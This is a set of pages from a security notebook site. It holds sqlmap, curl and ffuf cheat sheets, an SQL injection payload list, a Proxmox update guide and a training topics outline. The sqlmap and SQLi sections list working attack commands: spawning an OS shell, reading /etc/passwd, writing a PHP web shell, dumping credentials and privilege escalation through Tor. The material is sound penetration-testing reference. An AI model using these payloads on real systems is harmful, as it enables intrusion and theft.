"https://website.com/vulnerablepage/?id=1&Submit=Submit" --cookie="currentZAPcookie" --proxy http://127.0.0.1:8081 --batch --user-agent bughunter Searching for the word "pass" Copy sqlmap -u "https://website.com/vulnerablepage/?id=1&Submit=Submit" --cookie="currentZAPcookie" --proxy http://127.0.0.1:8081 -D db_name --search -C pass --batch Command Description `curl -h` curl help menu `curl website.com` Basic GET request `curl -s -O website.com/index.html` Download file `curl -k https://website.com` Skip HTTPS (SSL) certificate validation `curl website.com -v` Print full HTTP request/response details `curl -I https://www.website.com` Send HEAD request (only prints response headers) `curl -i https://www.website.com` Print response headers and response body `curl https://www.website.com -A 'Mozilla/5.0'` Set User-Agent header `curl -u admin:admin http://:/` Set HTTP basic authorization credentials `curl http://admin:admin@:/` Pass HTTP basic authorization credentials in the URL `curl -H 'Authorization: Basic YWRtaW46YWRtaW4=' http://:/` Set request header `curl 'http://:/search.php?search=le'` Pass GET parameters `curl -X POST -d 'username=admin&password=admin' http://:/` Send POST request with POST data `curl -b 'PHPSESSID=c1nsa6op7vtk7kdis7bcnbadf1' http://:/` Set request cookies `curl -X POST -d '{"search":"london"}' -H 'Content-Type: application/json' http://:/search.php` Send POST request with JSON data `curl -s https://sonar.omnisint.io/subdomains/{domain} | jq -r '.[]' | sort -u` All subdomains for a given domain. `curl -s https://sonar.omnisint.io/tlds/{domain} | jq -r '.[]' | sort -u` All TLDs found for a given domain. `curl -s https://sonar.omnisint.io/all/{domain} | jq -r '.[]' | sort -u` All results across all TLDs for a given domain. `curl -s https://sonar.omnisint.io/reverse/{ip} | jq -r '.[]' | sort -u` Reverse DNS lookup on IP address. `curl -s https://sonar.omnisint.io/reverse/{ip}/{mask} | jq -r '.[]' | sort -u` Reverse DNS lookup of a CIDR range. `curl -s "https://crt.sh/?q=${TARGET}&output=json" | jq -r '.[] | "\(.name_value)\n\(.common_name)"' | sort -u` Certificate Transparency. Command Description `ffuf -h` ffuf help `ffuf -w wordlist.txt:FUZZ -u http://SERVER_IP:PORT/FUZZ` Directory Fuzzing `ffuf -w wordlist.txt:FUZZ -u http://SERVER_IP:PORT/indexFUZZ` Extension Fuzzing `ffuf -w wordlist.txt:FUZZ -u http://SERVER_IP:PORT/blog/FUZZ.php` Page Fuzzing `ffuf -w wordlist.txt:FUZZ -u http://SERVER_IP:PORT/FUZZ -recursion -recursion-depth 1 -e .php -v` Recursive Fuzzing `ffuf -w wordlist.txt:FUZZ -u https://FUZZ.website.com/` Sub-domain Fuzzing `ffuf -w wordlist.txt:FUZZ -u http://academy.htb:PORT/ -H 'Host: FUZZ.website.com' -fs xxx` VHost Fuzzing `ffuf -w wordlist.txt:FUZZ -u http://admin.website.com:PORT/admin/admin.php?FUZZ=key -fs xxx` Parameter Fuzzing - GET `ffuf -w wordlist.txt:FUZZ -u http://admin.website.com:PORT/admin/admin.php -X POST -d 'FUZZ=key' -H 'Content-Type: application/x-www-form-urlencoded' -fs xxx` Parameter Fuzzing - POST `ffuf -w ids.txt:FUZZ -u http://admin.website.com:PORT/admin/admin.php -X POST -d 'id=FUZZ' -H 'Content-Type: application/x-www-form-urlencoded' -fs xxx` Value Fuzzing `ffuf -w ./vhosts -u http:// -H "HOST: FUZZ.target.domain" -fs 612` Bruteforcing for possible virtual hosts on the target domain using ffuf. `ffuf -recursion -recursion-depth 1 -u http://192.168.10.10/FUZZ -w /opt/useful/SecLists/Discovery/Web-Content/raft-small-directories-lowercase.txt` Discovering files and folders that cannot be spotted by browsing the website. `ffuf -w ./folders.txt:FOLDERS,./wordlist.txt:WORDLIST,./extensions.txt:EXTENSIONS -u http://www.target.domain/FOLDERS/WORDLISTEXTENSIONS` Mutated bruteforcing #### [](https://martian1337.gitbook.io/notes/notes/appsec/tools#nmap-1) Nmap Scan a port with Nmap via proxy with the `-Pn` flag to skip host discovery and scripts #### [](https://martian1337.gitbook.io/notes/notes/appsec/tools#sqlmap-1) SQLmap Command Description `sqlmap -h` View the basic help menu `sqlmap -hh` View the advanced help menu `sqlmap -u "http://www.example.com/vuln.php?id=1" --batch` Run `SQLMap` without asking for user input `sqlmap 'http://www.example.com/' --data 'uid=1&name=test'` `SQLMap` with POST request `sqlmap -u 'https://site.com' --data '{"User":"abcdefg","Pwd":"Abc@123"}' --random-agent --ignore-code=403 --dbs --hex` SQLMap POST with JSON data `sqlmap 'http://www.example.com/' --data 'uid=1*&name=test'` POST request specifying an injection point with an asterisk `sqlmap -r req.txt` Passing an HTTP request file to `SQLMap` `sqlmap ... --cookie='PHPSESSID=ab4530f4a7d10448457fa8b0eadac29c'` Specifying a cookie header `sqlmap -u www.target.com --data='id=1' --method PUT` Specifying a PUT request `sqlmap -u "http://www.target.com/vuln.php?id=1" --batch -t /tmp/traffic.txt` Store traffic to an output file `sqlmap -u "http://www.target.com/vuln.php?id=1" -v 6 --batch` Specify verbosity level `sqlmap -u "www.example.com/?q=test" --prefix="%'))" --suffix="-- -"` Specifying a prefix or suffix `sqlmap -u www.example.com/?id=1 -v 3 --level=5` Specifying the level and risk `sqlmap -u "http://www.example.com/?id=1" --banner --current-user --current-db --is-dba` Basic DB enumeration `sqlmap -u "http://www.example.com/?id=1" --tables -D testdb` Table enumeration `sqlmap -u "http://www.example.com/?id=1" --dump -T users -D testdb -C name,surname` Table/row enumeration `sqlmap -u "http://www.example.com/?id=1" --dump -T users -D testdb --where="name LIKE 'f%'"` Conditional enumeration `sqlmap -u "http://www.example.com/?id=1" --schema` Database schema enumeration `sqlmap -u "http://www.example.com/?id=1" --search -T user` Searching for data `sqlmap -u "http://www.example.com/?id=1" --passwords --batch` Password enumeration and cracking `sqlmap -u "http://www.example.com/" --data="id=1&csrf-token=WfF1szMUHhiokx9AHFply5L2xAOfjRkE" --csrf-token="csrf-token"` Anti-CSRF token bypass `sqlmap --list-tampers` List all tamper scripts `sqlmap -u "http://www.example.com/case1.php?id=1" --is-dba` Check for DBA privileges `sqlmap -u "http://www.example.com/?id=1" --file-read "/etc/passwd"` Reading a local file `sqlmap -u "http://www.example.com/?id=1" --file-write "shell.php" --file-dest "/var/www/html/shell.php"` Writing a file `sqlmap -u "http://www.example.com/?id=1" --os-shell` Spawning an OS shell **Additional SQLmap uses** CTF (fast, but it's noisy) Stealth (stealthy, but slow at the same time) stealth + OS access (same as above, but this can attempt to access the OS with metasploit if an exploit is found) **Setup** 1. Set manual upstream proxy (Burp/ZAP) 2. Save first successful request as new collection 3. Highlight base URL and right-click "set as variable" and select collection scope 4. Set other common URLs for testing as different variables 5. Verify new variables by hovering over Collection>"more actions" dropdown menu> Variables tab **Query Parameters** 1. Name and Save new request to corresponding collection (Optional) Modify key and value pair `{{baseURL}}?key=value` **Path Variables** [PreviousDNS](https://martian1337.gitbook.io/notes/notes/appsec/dns) [NextCommand Injection Testing](https://martian1337.gitbook.io/notes/notes/appsec/command-injection-testing) Last updated 1 year ago Copy nmap --proxies http://127.0.0.1:8080 SERVER_IP -pPORT -Pn -sC Copy sqlmap --random-agent -u --crawl 10 --all --level=5 --risk=3 -f --beep --output-dir=. -o --no-cast --batch --check-internet --tamper=space2comment,randomcase,between Copy sqlmap --random-agent --crawl=10 -u --tor --check-tor --all --level=5 --risk=2 -f --beep --force-ssl --output-dir=. -o --tamper=space2comment,randomcase,between --no-cast --batch --check-internet --force-ssl Copy sqlmap --random-agent -u --tor --check-tor --all --os-pwn --msf-path=/opt/metasploit-framework/ --priv-esc --level=5 --risk=2 -f --beep --force-ssl --output-dir=. -o --tamper=space2comment --no-cast --batch --check-internet --- # Password Attacks | Martian Defense NoteBook For the complete documentation index, see [llms.txt](https://martian1337.gitbook.io/notes/llms.txt) . This page is also available as [Markdown](https://martian1337.gitbook.io/notes/notes/network-security/password-attacks.md) . [Internal Password Spraying](https://martian1337.gitbook.io/notes/notes/network-security/password-attacks/internal-password-spraying) [Remote Password Attacks](https://martian1337.gitbook.io/notes/notes/network-security/password-attacks/remote-password-attacks) [Linux Local Password Attacks](https://martian1337.gitbook.io/notes/notes/network-security/password-attacks/linux-local-password-attacks) [Windows Local Password Attacks](https://martian1337.gitbook.io/notes/notes/network-security/password-attacks/windows-local-password-attacks) [Windows Lateral Movement](https://martian1337.gitbook.io/notes/notes/network-security/password-attacks/windows-lateral-movement) [PreviousCredentialed Enumeration](https://martian1337.gitbook.io/notes/notes/network-security/credentialed-enumeration) [NextInternal Password Spraying](https://martian1337.gitbook.io/notes/notes/network-security/password-attacks/internal-password-spraying) Last updated 1 year ago --- # Security | Martian Defense NoteBook For the complete documentation index, see [llms.txt](https://martian1337.gitbook.io/notes/llms.txt) . This page is also available as [Markdown](https://martian1337.gitbook.io/notes/notes/coding-programming/golang/security.md) . Golang is a programming language that has many amazing features to it, so what exactly makes go suited for security specifically? In order to solve this, a table has been provided below. Feature Reason for use in cyber security Standard Library Most language's currently used in cyber security realms that are interpreted such as python have a major issue with not providing the correct standard library to do exactly what you need. this leaves it completely up to the user to download and install third party libraries to complete the task they need to. Golang has an amazing standard library that makes it easy to setup requests, parse files, load specific information while also allowing for a much more versatile impact Type System Unlike most programming language's, go has an amazing type system which holds data types such as rune, string, interface, byte, unsigned integers, big integers, integers, floats, complex numbers and even more mathematically detailed data types. This allows users to easily work with files, systems and type specific operations Speed and performance Golang is one of the faster more used programming language's because of the way it's compiler optimizes and generates code while also working with virtual tables! Concurrency Another amazing feature of the Go programming language is that it is a very very thread heavy language and has support for atomic, async, mutex and other various threading factors ### [](https://martian1337.gitbook.io/notes/notes/coding-programming/golang/security#files) Files Every programming language has some form of file system, it has some form of extension that is also run through the compiler or interpreter. Golang has multiple files which are placed in the table below. File type / Extension Purpose or reason for use .go Golang source code file. These types of files are where source code will come into handy .mod Golang Module file. These files are used for directories and module development which will be talked about later .sum Golang Module file which holds all the cryptographic signatures for third party libraries in use within the project [](https://martian1337.gitbook.io/notes/notes/coding-programming/golang/security#module-gosecurity-related-development) Module (GoSecurity Related Development) -------------------------------------------------------------------------------------------------------------------------------------------------------------------- This module will talk about specific use case's for the Go programming language and explain specific programs that will help you better analyze everything. For context, this will all be split into their own sub sections based on their type of usage or topic. For example, forensics will have its own section ( file forensics ) where the tree will look something like this. Copy GoSecurity | |- Forensics | File catching | File Parsing | File checking |- Cryptography / Encoding | Encodings | Ciphers | Encryption algorithms | Encrypting files As this structure works much better for organization than just shoving everything into one single file. [PreviousTheory](https://martian1337.gitbook.io/notes/notes/coding-programming/golang/theory) [NextModules](https://martian1337.gitbook.io/notes/notes/coding-programming/golang/modules) Last updated 1 year ago * [Files](https://martian1337.gitbook.io/notes/notes/coding-programming/golang/security#files) * [Module (GoSecurity Related Development)](https://martian1337.gitbook.io/notes/notes/coding-programming/golang/security#module-gosecurity-related-development) --- # Proxmox Update Setup Guide | Martian Defense NoteBook For the complete documentation index, see [llms.txt](https://martian1337.gitbook.io/notes/llms.txt) . This page is also available as [Markdown](https://martian1337.gitbook.io/notes/digital-privacy/self-hosting/proxmox-ve/proxmox-update-setup-guide.md) . ### [](https://martian1337.gitbook.io/notes/digital-privacy/self-hosting/proxmox-ve/proxmox-update-setup-guide#id-1.-configure-proxmox-repositories) 1\. Configure Proxmox Repositories Proper repository setup ensures your Proxmox server can fetch the latest updates. 1. Check your APT sources: Copy sudo nano /etc/apt/sources.list Make sure you have the Debian base repository, for example: Copy deb http://ftp.debian.org/debian/ buster main contrib 1. Verify or add the Proxmox repository. For non-subscription users, create or edit: Copy sudo nano /etc/apt/sources.list.d/pve-no-subscription.list Add: Copy deb http://download.proxmox.com/debian/pve buster pve-no-subscription For subscription users, enable the enterprise repo by creating or editing: Copy sudo nano /etc/apt/sources.list.d/pve-enterprise.list Add: Copy deb https://enterprise.proxmox.com/debian/pve buster pve-enterprise Replace `buster` with your Debian version codename if different (e.g., `bullseye`, `bookworm`). * * * ### [](https://martian1337.gitbook.io/notes/digital-privacy/self-hosting/proxmox-ve/proxmox-update-setup-guide#id-2.-manual-update-process) 2\. Manual Update Process To manually update your Proxmox server: 1. Refresh the package list: 1. Upgrade packages: * Use the `-y` flag to skip prompts (e.g., `sudo apt full-upgrade -y`), but note this will automatically accept all changes. * After upgrading, check your Proxmox version with: * * * ### [](https://martian1337.gitbook.io/notes/digital-privacy/self-hosting/proxmox-ve/proxmox-update-setup-guide#id-3.-configure-unattended-upgrades-optional) 3\. Configure Unattended Upgrades (Optional) Automate updates for security and critical packages, including Proxmox. You can also set up a cron job like [PatchMe](https://github.com/Martian1337/One-Liners?tab=readme-ov-file#patchme) to regularly run updates. However, it’s best to handle Proxmox updates manually for more control. #### [](https://martian1337.gitbook.io/notes/digital-privacy/self-hosting/proxmox-ve/proxmox-update-setup-guide#install-unattended-upgrades) Install unattended-upgrades #### [](https://martian1337.gitbook.io/notes/digital-privacy/self-hosting/proxmox-ve/proxmox-update-setup-guide#configure-allowed-origins) Configure Allowed Origins Edit the unattended-upgrades config: Ensure the following entries are present and uncommented under `Unattended-Upgrade::Allowed-Origins`: Adjust the codename (`buster`) as needed. #### [](https://martian1337.gitbook.io/notes/digital-privacy/self-hosting/proxmox-ve/proxmox-update-setup-guide#enable-unattended-upgrades) Enable Unattended Upgrades Run the setup wizard: Select **Yes** to enable automatic updates. #### [](https://martian1337.gitbook.io/notes/digital-privacy/self-hosting/proxmox-ve/proxmox-update-setup-guide#configure-update-frequency) Configure Update Frequency Edit: Set the following to enable daily updates and cleaning: #### [](https://martian1337.gitbook.io/notes/digital-privacy/self-hosting/proxmox-ve/proxmox-update-setup-guide#review-logs) Review Logs Check update logs to verify unattended-upgrades are running correctly: * * * ### [](https://martian1337.gitbook.io/notes/digital-privacy/self-hosting/proxmox-ve/proxmox-update-setup-guide#id-4.-troubleshooting-and-tips) 4\. Troubleshooting and Tips * Confirm that repository URLs are correct and reachable. * If you have a subscription, verify your status with `pveversion`. * Use the Proxmox forums or official docs for error messages related to repositories or upgrades. * Consider automating updates cautiously—automatic upgrades may occasionally require manual intervention. * * * [](https://martian1337.gitbook.io/notes/digital-privacy/self-hosting/proxmox-ve/proxmox-update-setup-guide#summary-tables) Summary Tables ---------------------------------------------------------------------------------------------------------------------------------------------- Configuration Step Command/Location Notes Verify Debian repo `/etc/apt/sources.list` Ensure correct Debian base repo Add Proxmox no-subscription repo `/etc/apt/sources.list.d/pve-no-subscription.list` For users without subscription Add Proxmox enterprise repo `/etc/apt/sources.list.d/pve-enterprise.list` For users with subscription Update package list `sudo apt update` Refresh package cache Manual upgrade `sudo apt full-upgrade` Upgrade all packages Check Proxmox version `pveversion` Verify current version Install unattended-upgrades `sudo apt install unattended-upgrades` For automatic updates Configure allowed origins `/etc/apt/apt.conf.d/50unattended-upgrades` Add Debian and Proxmox origins Enable unattended-upgrades `sudo dpkg-reconfigure unattended-upgrades` Activate auto-updates Configure update schedule `/etc/apt/apt.conf.d/20auto-upgrades` Set frequency for updates Check unattended-upgrades logs `/var/log/unattended-upgrades/unattended-upgrades.log` Verify automatic update activity Update Method Manual Automatic (Unattended) Requires Repository Setup Yes Yes User Confirmation Needed Yes No Risk of Unwanted Changes Low (you control it) Higher (automatic) Best for Proxmox Version Control Yes Recommended for security patches [PreviousProxmox VE](https://martian1337.gitbook.io/notes/digital-privacy/self-hosting/proxmox-ve) [NextEnable and test Wake-on-LAN (WOL)](https://martian1337.gitbook.io/notes/digital-privacy/self-hosting/proxmox-ve/enable-and-test-wake-on-lan-wol) Last updated 10 months ago * [1\. Configure Proxmox Repositories](https://martian1337.gitbook.io/notes/digital-privacy/self-hosting/proxmox-ve/proxmox-update-setup-guide#id-1.-configure-proxmox-repositories) * [2\. Manual Update Process](https://martian1337.gitbook.io/notes/digital-privacy/self-hosting/proxmox-ve/proxmox-update-setup-guide#id-2.-manual-update-process) * [3\. Configure Unattended Upgrades (Optional)](https://martian1337.gitbook.io/notes/digital-privacy/self-hosting/proxmox-ve/proxmox-update-setup-guide#id-3.-configure-unattended-upgrades-optional) * [4\. Troubleshooting and Tips](https://martian1337.gitbook.io/notes/digital-privacy/self-hosting/proxmox-ve/proxmox-update-setup-guide#id-4.-troubleshooting-and-tips) * [Summary Tables](https://martian1337.gitbook.io/notes/digital-privacy/self-hosting/proxmox-ve/proxmox-update-setup-guide#summary-tables) Copy sudo apt update Copy sudo apt full-upgrade Copy pveversion Copy sudo apt install unattended-upgrades Copy sudo nano /etc/apt/apt.conf.d/50unattended-upgrades Copy "Debian:buster-security"; "Debian:buster-updates"; "Proxmox:buster"; Copy sudo dpkg-reconfigure --priority=low unattended-upgrades Copy sudo nano /etc/apt/apt.conf.d/20auto-upgrades Copy APT::Periodic::Update-Package-Lists "1"; APT::Periodic::Download-Upgradeable-Packages "1"; APT::Periodic::AutocleanInterval "7"; APT::Periodic::Unattended-Upgrade "1"; Copy sudo tail -f /var/log/unattended-upgrades/unattended-upgrades.log --- # SQL Injection Fundamentals | Martian Defense NoteBook For the complete documentation index, see [llms.txt](https://martian1337.gitbook.io/notes/llms.txt) . This page is also available as [Markdown](https://martian1337.gitbook.io/notes/notes/cheatsheets/web-security-testing/sql-injection-fundamentals.md) . ### [](https://martian1337.gitbook.io/notes/notes/cheatsheets/web-security-testing/sql-injection-fundamentals#mysql-basic-commands) MySQL Basic Commands Command Description `mysql -u root -h docker.hackthebox.eu -P 3306 -p` Login to MySQL database `SHOW DATABASES` List available databases `USE users` Switch to database ### [](https://martian1337.gitbook.io/notes/notes/cheatsheets/web-security-testing/sql-injection-fundamentals#tables-management) Tables Management Command Description `CREATE TABLE logins (id INT, ...)` Add a new table `SHOW TABLES` List tables in current database `DESCRIBE logins` Show table properties and columns `INSERT INTO table_name VALUES (value_1,..)` Add values to table `INSERT INTO table_name(column2, ...) VALUES (column2_value, ..)` Add values to specific columns `UPDATE table_name SET column1=newvalue1, ... WHERE ` Update table values ### [](https://martian1337.gitbook.io/notes/notes/cheatsheets/web-security-testing/sql-injection-fundamentals#columns-manipulation) Columns Manipulation Command Description `SELECT * FROM table_name` Show all columns in a table `SELECT column1, column2 FROM table_name` Show specific columns `DROP TABLE logins` Delete a table `ALTER TABLE logins ADD newColumn INT` Add new column `ALTER TABLE logins RENAME COLUMN newColumn To oldColumn` Rename column `ALTER TABLE logins MODIFY oldColumn DATE` Change column datatype `ALTER TABLE logins DROP oldColumn` Delete column ### [](https://martian1337.gitbook.io/notes/notes/cheatsheets/web-security-testing/sql-injection-fundamentals#output-and-sorting) Output and Sorting Command Description `SELECT * FROM logins ORDER BY column_1` Sort by column ascending `SELECT * FROM logins ORDER BY column_1 DESC` Sort descending `SELECT * FROM logins ORDER BY column_1 DESC, id ASC` Sort by multiple columns `SELECT * FROM logins LIMIT 2` Show first two results `SELECT * FROM logins LIMIT 1, 2` Show 2 results starting from index 2 `SELECT * FROM table_name WHERE ` Filter results by condition `SELECT * FROM logins WHERE username LIKE 'admin%'` Filter results by pattern ### [](https://martian1337.gitbook.io/notes/notes/cheatsheets/web-security-testing/sql-injection-fundamentals#mysql-operator-precedence) MySQL Operator Precedence * Division (/), Multiplication (\*), and Modulus (%) * Addition (+) and Subtraction (-) * Comparison (=, >, <, <=, >=, !=, LIKE) * NOT (!) * AND (&&) * OR (||) * * * ### [](https://martian1337.gitbook.io/notes/notes/cheatsheets/web-security-testing/sql-injection-fundamentals#sql-injection-payloads) SQL Injection Payloads ### [](https://martian1337.gitbook.io/notes/notes/cheatsheets/web-security-testing/sql-injection-fundamentals#authentication-bypass) Authentication Bypass Payload Description `admin' or '1'='1` Basic Auth Bypass `admin')--` Auth Bypass with comments ### [](https://martian1337.gitbook.io/notes/notes/cheatsheets/web-security-testing/sql-injection-fundamentals#union-injection) Union Injection Payload Description `' order by 1--` Detect number of columns by ordering `cn' UNION select 1,2,3-- -` Detect number of columns using Union `cn' UNION select 1,@@version,3,4-- -` Basic Union injection `UNION select username, 2, 3, 4 from passwords-- -` Union injection with 4 columns ### [](https://martian1337.gitbook.io/notes/notes/cheatsheets/web-security-testing/sql-injection-fundamentals#database-enumeration) Database Enumeration Payload Description `SELECT @@version` Get MySQL version `SELECT SLEEP(5)` Delay query (fingerprint) `cn' UNION select 1,database(),2,3-- -` Get current database name `cn' UNION select 1, schema_name,3,4 from INFORMATION_SCHEMA.SCHEMATA --` List all databases ### [](https://martian1337.gitbook.io/notes/notes/cheatsheets/web-security-testing/sql-injection-fundamentals#table-and-column-enumeration) Table and Column Enumeration Payload Description `cn' UNION select 1, TABLE_NAME, TABLE_SCHEMA, 4 from INFORMATION_SCHEMA.TABLES where table_schema='dev' --` List all tables in a database `cn' UNION select 1, COLUMN_NAME, TABLE_NAME, TABLE_SCHEMA from INFORMATION_SCHEMA.COLUMNS where table_name='credentials'--` List all columns in a table `cn' UNION select 1, username, password, 4 from dev.credentials--` Dump data from another database's table ### [](https://martian1337.gitbook.io/notes/notes/cheatsheets/web-security-testing/sql-injection-fundamentals#privilege-checks) Privilege Checks Payload Description `cn' UNION SELECT 1, user(), 3, 4--` Find current user `cn' UNION SELECT 1, super_priv, 3, 4 FROM mysql.user WHERE user="root"--` Check admin privileges `cn' UNION SELECT 1, grantee, privilege_type, is_grantable FROM information_schema.user_privileges WHERE grantee="'root'@'localhost'"--` Check all user privileges `cn' UNION SELECT 1, variable_name, variable_value, 4 FROM information_schema.global_variables where variable_name="secure_file_priv"--` Check accessible directories ### [](https://martian1337.gitbook.io/notes/notes/cheatsheets/web-security-testing/sql-injection-fundamentals#file-injection) File Injection Payload Description `cn' UNION SELECT 1, LOAD_FILE("/etc/passwd"), 3, 4--` Read local file `/etc/passwd` `select 'file written successfully!' into outfile '/var/www/html/proof.txt'` Write string to local file `cn' union select "",'', "" into outfile '/var/www/html/shell.php'-- -` Write web shell in web directory [PreviousWeb Fuzzing](https://martian1337.gitbook.io/notes/notes/cheatsheets/web-security-testing/web-fuzzing) [NextLogin Brute Forcing](https://martian1337.gitbook.io/notes/notes/cheatsheets/web-security-testing/login-brute-forcing) Last updated 5 months ago * [MySQL Basic Commands](https://martian1337.gitbook.io/notes/notes/cheatsheets/web-security-testing/sql-injection-fundamentals#mysql-basic-commands) * [Tables Management](https://martian1337.gitbook.io/notes/notes/cheatsheets/web-security-testing/sql-injection-fundamentals#tables-management) * [Columns Manipulation](https://martian1337.gitbook.io/notes/notes/cheatsheets/web-security-testing/sql-injection-fundamentals#columns-manipulation) * [Output and Sorting](https://martian1337.gitbook.io/notes/notes/cheatsheets/web-security-testing/sql-injection-fundamentals#output-and-sorting) * [MySQL Operator Precedence](https://martian1337.gitbook.io/notes/notes/cheatsheets/web-security-testing/sql-injection-fundamentals#mysql-operator-precedence) * [SQL Injection Payloads](https://martian1337.gitbook.io/notes/notes/cheatsheets/web-security-testing/sql-injection-fundamentals#sql-injection-payloads) * [Authentication Bypass](https://martian1337.gitbook.io/notes/notes/cheatsheets/web-security-testing/sql-injection-fundamentals#authentication-bypass) * [Union Injection](https://martian1337.gitbook.io/notes/notes/cheatsheets/web-security-testing/sql-injection-fundamentals#union-injection) * [Database Enumeration](https://martian1337.gitbook.io/notes/notes/cheatsheets/web-security-testing/sql-injection-fundamentals#database-enumeration) * [Table and Column Enumeration](https://martian1337.gitbook.io/notes/notes/cheatsheets/web-security-testing/sql-injection-fundamentals#table-and-column-enumeration) * [Privilege Checks](https://martian1337.gitbook.io/notes/notes/cheatsheets/web-security-testing/sql-injection-fundamentals#privilege-checks) * [File Injection](https://martian1337.gitbook.io/notes/notes/cheatsheets/web-security-testing/sql-injection-fundamentals#file-injection) --- # Cybersecurity Training Topics | Martian Defense NoteBook For the complete documentation index, see [llms.txt](https://martian1337.gitbook.io/notes/llms.txt) . This page is also available as [Markdown](https://martian1337.gitbook.io/notes/training-and-career/guides/cybersecurity-training-topics.md) . ### [](https://martian1337.gitbook.io/notes/training-and-career/guides/cybersecurity-training-topics#id-1.-threats-attacks-and-vulnerabilities) 1\. Threats, Attacks, and Vulnerabilities * Types of Malware: Viruses, worms, trojans, ransomware, spyware, adware, rootkits, botnets, RAT, polymorphic malware, keyloggers, grayware. * Types of Attacks: Social engineering attacks, Man-in-the-Middle, DDoS and DoS attacks, code injection attacks, replay attacks, rainbow table attacks, dictionary attacks, pass the hash, hijacking and related attacks, Advanced Persistent Threats (APTs). * Physical security attacks: Tailgating, lock picking, fence jumping. * Threat Actors: Insider threats, nation-states/APTs, organized crime, script kiddies, hacktivists, cyberterrorists, unintentional threats. * Indicators of Compromise: Unusual network traffic, anomalies in privileged user account activity, sudden increase in database read volume, suspicious registry or system file changes. * IoT and embedded device threats: Insecure configurations, weak authentication, firmware vulnerabilities. * Advanced Threat Tactics: Living off the land attacks, fileless malware. * Malware Analysis: Static and dynamic analysis techniques, behavior analysis. * Insider Threats: Detection and mitigation strategies. * Fileless Malware: Analysis and response techniques. * Social Engineering: Pretexting, quid pro quo, tailgating, manipulation techniques. * Supply Chain Attacks: Assessing and securing the software and hardware supply chain. * Zero-day Vulnerabilities: Identifying and addressing undisclosed vulnerabilities. * Incident Response: Incident handling and response, containment, eradication, recovery. * Threat Hunting: Proactive identification of advanced threats. * Mobile Device Security: Best practices for securing smartphones, tablets, and other mobile devices. * Wireless Security: Securing wireless networks, preventing unauthorized access. * Web Application Security: Secure coding practices, input validation, output encoding, session management. ### [](https://martian1337.gitbook.io/notes/training-and-career/guides/cybersecurity-training-topics#id-2.-identity-and-access-management) 2\. Identity and Access Management * Account Management: Least privilege, onboarding/offboarding processes, permission auditing, password complexity. * Access Control Models: Role-Based Access Control (RBAC), Mandatory Access Control (MAC), Discretionary Access Control (DAC), Attribute-Based Access Control (ABAC). * Identity Repositories: LDAP, SQL databases, Active Directory, federated identities. * Biometric Authentication: Fingerprints, retina scanning, facial recognition. * Multi-Factor Authentication (MFA): Different factors, implementation methods. * Identity as a Service (IDaaS): Cloud-based identity management. * Cloud Identity and Access Management: AWS IAM, Google IAM, Azure AD. * Privileged Access Management (PAM): Managing and securing administrative access. * Federation and Single Sign-On (SSO): OAuth, OpenID Connect, SAML. * Privileged Account Management (PAM): Monitoring and controlling privileged accounts. * Just-in-Time (JIT) and Just-Enough-Access (JEA): Provisioning temporary and limited access. * Identity Governance and Administration (IGA): Managing digital identities, roles, entitlements. * Biometric Technologies: Voice recognition, gait analysis, behavioral biometrics. * Passwordless Authentication: Alternative authentication methods. * Single Sign-On (SSO) Federation: Federated identity providers, SSO protocols. * Privilege Escalation: Techniques used to gain elevated privileges. ### [](https://martian1337.gitbook.io/notes/training-and-career/guides/cybersecurity-training-topics#id-3.-technologies-and-tools) 3\. Technologies and Tools * Network Security: Firewalls, IDS/IPS, VPNs, network scanners, vulnerability scanners. * Endpoint Security: Antivirus, anti-malware, host-based firewalls, host-based IDS/IPS. * Security Information and Event Management (SIEM) Systems: Real-time monitoring, log collection, correlation. * Secure Staging Deployment: Sandbox environments, secure baseline configurations. * Cloud-Based Security Tools: Web Application Firewalls (WAFs), Cloud Access Security Brokers (CASBs), Cloud Security Posture Management (CSPM) tools. * Security Orchestration, Automation, and Response (SOAR): Automating security operations and incident response. * Endpoint Detection and Response (EDR): Real-time threat monitoring and response on endpoints. * Firewalls: Next-generation firewalls (NGFWs), application-aware firewalls, web application firewalls (WAFs). * Security in DevOps: Integrating security practices into DevOps workflows and pipelines. * IoT Security: Securing Internet of Things (IoT) devices and networks. * Secure Email Gateways (SEG): Protection against email-based threats such as phishing and malware. * Cloud Workload Protection Platforms (CWPP): Securing cloud workloads and containers. * DevSecOps: Integrating security practices into DevOps methodologies. * Secure Remote Access: Virtual Private Networks (VPNs), remote desktop solutions, multi-factor authentication (MFA). * Web Application Firewalls (WAFs): Protecting web applications from common attacks. * Cloud Security: Securely deploying and managing applications and services in cloud environments. * Intrusion Detection Systems/Intrusion Prevention Systems (IDS/IPS): Monitoring and preventing unauthorized access and attacks. * Vulnerability Scanners: Identifying and assessing vulnerabilities in systems and applications. * Security Information and Event Management (SIEM) Systems: Collecting and analyzing security event logs for threat detection and incident response. ### [](https://martian1337.gitbook.io/notes/training-and-career/guides/cybersecurity-training-topics#id-4.-risk-management) 4\. Risk Management * Vulnerability Management: Vulnerability scanning, patch management, remediation processes. * Data Loss Prevention (DLP): Techniques to prevent data leakage, such as endpoint DLP, network DLP, email DLP. * Vendor Risk Management: Assessing and managing risks associated with third-party vendors and suppliers. * Risk Management Frameworks: ISO 27001/27002, NIST SP800-53, COBIT, ITIL. * Incident Response procedures: Incident response planning, initial response, documentation, escalation, reporting, post-incident response. * Business Impact Analysis (BIA): Assessing potential effects of disruptions to business functions. * Disaster Recovery: Recovery Point Objective (RPO), Recovery Time Objective (RTO), recovery strategies. * Continuous Monitoring: Ongoing tracking and evaluation of security controls. * Business Continuity Management (BCM): Developing and testing plans to ensure business resilience. * Privacy and Data Protection Laws: Understanding global regulations such as GDPR, CCPA, HIPAA. * Threat Modeling: Identifying and evaluating potential threats and vulnerabilities in systems and applications. * Quantitative and Qualitative Risk Assessment: Estimating and evaluating risks using numerical or descriptive methods. * Risk Register and Risk Treatment Plan: Documenting identified risks and defining appropriate risk response strategies. * Security Assessment and Authorization: Evaluating and authorizing systems to operate within acceptable risk levels. * Privacy Impact Assessments (PIA): Assessing the privacy risks and impacts of systems and processes. * Security Program Management: Developing and managing security programs, policies, and procedures. * Security Governance: Roles and responsibilities, compliance with regulations and standards. ### [](https://martian1337.gitbook.io/notes/training-and-career/guides/cybersecurity-training-topics#id-5.-architecture-and-design) 5\. Architecture and Design * Security Frameworks: CIS Controls, NIST Cybersecurity Framework, ISO/IEC 27001. * Secure Network Design: Segmentation, network access control (NAC), zero-trust networks. * Container Security: Securing container technologies like Docker and Kubernetes. * Secure Mobile Device Deployment: Implementing mobile device management (MDM) solutions and enforcing device security policies. * Software-Defined Networking (SDN) Security: Securing virtualized network environments and network function virtualization (NFV). * Web 